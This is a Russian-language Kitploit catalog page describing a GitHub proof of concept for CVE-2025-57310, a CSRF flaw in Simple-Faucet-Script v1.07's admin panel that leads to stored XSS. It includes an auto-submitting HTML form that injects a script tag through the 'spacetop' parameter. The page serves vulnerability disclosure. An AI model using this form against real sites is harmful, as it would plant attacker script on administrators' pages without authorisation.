Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-57310 — Эксплойт доказательства концепции для CVE-2025-57310: уязвимость CSRF в Simple-Faucet-Script v1.07, позволяющая хранимую XSS через специально созданные POST-запросы к панели администратора. | Kitploit
Инструменты/GitHubGitHub/hossainshadat/cve-2025-57310
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubhossainshadat/cve-2025-57310

CVE-2025-57310

Эксплойт доказательства концепции для CVE-2025-57310: уязвимость CSRF в Simple-Faucet-Script v1.07, позволяющая хранимую XSS через специально созданные POST-запросы к панели администратора.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
8 месяцев назадЕщё не проверено

CVE-2025-57310

Уязвимость межсайтовой подделки запроса (CSRF) в Salmen2/Simple-Faucet-Script v1.07 через специально созданный POST-запрос к admin.php?p=ads&c=1, позволяющая злоумышленникам выполнять произвольный код.

CWE

CWE-352: Межсайтовая подделка запроса (CSRF)

Базовый балл CVSS v3.1: 8.8 (Высокий)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Краткое описание

Продукт уязвим к межсайтовой подделке запроса (CSRF) в панели администратора. Когда аутентифицированный администратор посещает вредоносную страницу, содержащую PoC, CSRF-атака вызывает несанкционированное изменение содержимого главной страницы.

Шаги для воспроизведения

  1. Выполните вход как администратор на https://example.com/admin.php
  2. Откройте следующий PoC, обратите внимание на всплывающее предупреждение на главной странице (Сохраненный XSS).
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

Воздействие

Злоумышленник может внедрить произвольный HTML/JavaScript на главную страницу через параметр spacetop, что приводит к сохраненному межсайтовому скриптингу (Stored XSS).

Скачать инструмент